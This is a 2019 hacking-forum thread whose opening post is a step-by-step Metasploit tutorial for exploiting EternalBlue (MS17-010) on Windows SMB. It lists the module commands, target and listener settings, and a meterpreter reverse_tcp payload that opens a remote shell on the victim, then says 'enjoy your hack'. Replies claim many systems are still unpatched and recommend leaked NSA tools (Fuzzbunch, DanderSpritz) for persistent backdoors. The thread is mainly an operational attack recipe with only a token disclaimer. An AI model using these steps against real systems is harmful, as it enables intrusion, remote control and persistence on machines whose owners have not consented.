How To Exploit by using EternalBlue Nsa Exploit

Darknimbus1 · May 26, 2019, 6:41am

Greetings hacker My english is quite bad and also correct me if am wrong cuz we learn from our mistake so lets begin

EternalBlue is an exploit most likely developed by the NSA as a former zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the Tailored Access Operations unit of the NSA.

EternalBlue, also known as MS17-010, is a vulnerability in Microsoft’s Server Message Block (SMB) protocol. SMB allows systems to share access to files, printers, and other resources on the network. The vulnerability is allowed to occur because earlier versions of SMB contain a flaw that lets an attacker establish a null session connection via anonymous login. An attacker can then send malformed packets and ultimately execute arbitrary commands on the target.

Step 1
The first thing we need to do is open up the terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not running already, followed by msfconsole.

Step 2
search eternalblue

It will show like this

Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

There is an auxiliary scanner that we can run to determine if a target is vulnerable to MS17-010.

Step 3

One we discover that target is vunerable with eternalblue Ms17-010

We can enter command
use exploit/windows/smb/ms17_010_eternalblue

Then type show options

Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name – ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Set rhost target ip like 192.168.bla.bla.bla
Set lhost your ip bla.bla.bla.blaa.bla
Set lport any port like 4444 or 8080
Set processinject explorer.exe
set payload windows/x64/meterpreter/reverse_tcp
Note do not change r port leave it as it is cuz it work on port 445 if u change r port it wont work

And last u have to type Exploit

And enjoy your hack [but dont do it for mallicious purpose i am not responsible for that]

If i left something wrong correct it thanks …

We r anonymous
We r legion
Expect us

NuBz · May 28, 2019, 6:15pm

Just for referencework both of my fully patched win7 machines show not vulnerable in case anyone might want to know.
Going to mess with my XP VM though in a little bit and see what happens.

Darknimbus1 · June 4, 2019, 11:04pm

This exploit is patched by microsoft but their r many more system which is not patch and users r also unaware with this
Types of exploits so 80% chance is that this type of attack is effective

NuBz · June 5, 2019, 1:13am

I found out this isn’t the actual correct way to do it every time it seems to vary.

Sometimes the scanner for it is even wrong

S1l3n7 · June 7, 2019, 11:29pm

Another way to use the eternalblue exploit is through fuzzbunch and dandersprits. The 2 programs designed and developed by the NSA that were leaked as part of the shadowbrokers dumps. Both can be found on github.
The installation process is described here: ShadowBrokers Leak

Fuzzbunch leverages the eternalblue exploit while Danderspritz has a plethora of post modules used once the eternalblue backdoor has been installed into a system.

ring0 · July 14, 2019, 6:32pm

Was the anonymous catchphrase at the end a joke or are you being fr ? lol

BuGz · July 14, 2019, 9:08pm

This is why to use Metasploit.
There is no need to install a backdoor.
It checks to see if the target is vulnerable and proceeds from there.
Much quicker and easier.

In my opinion I see no reason to use anything else for this exploit.

MoNsTeR · July 14, 2019, 10:08pm

Yes MetaSploit is great. They have a great scan auxiliary and exploit module for eternal flavors.

BuGz · July 14, 2019, 11:45pm

Of course I should have said that there is nothing wrong with learning different methods(the right thing to do I would say) the more you know the better.

S1L3nt78 · July 15, 2019, 6:34am

Yes metasploit is quicker, but having a persistent backdoor installed is quite useful. Besides the fact the if you use danderspritz with fuzzbunch there are some other really useful tools that you can incorporate

BuGz · July 15, 2019, 7:32pm

Makes sense and your point is very valid.
Besides learning different methods being a smart thing to do.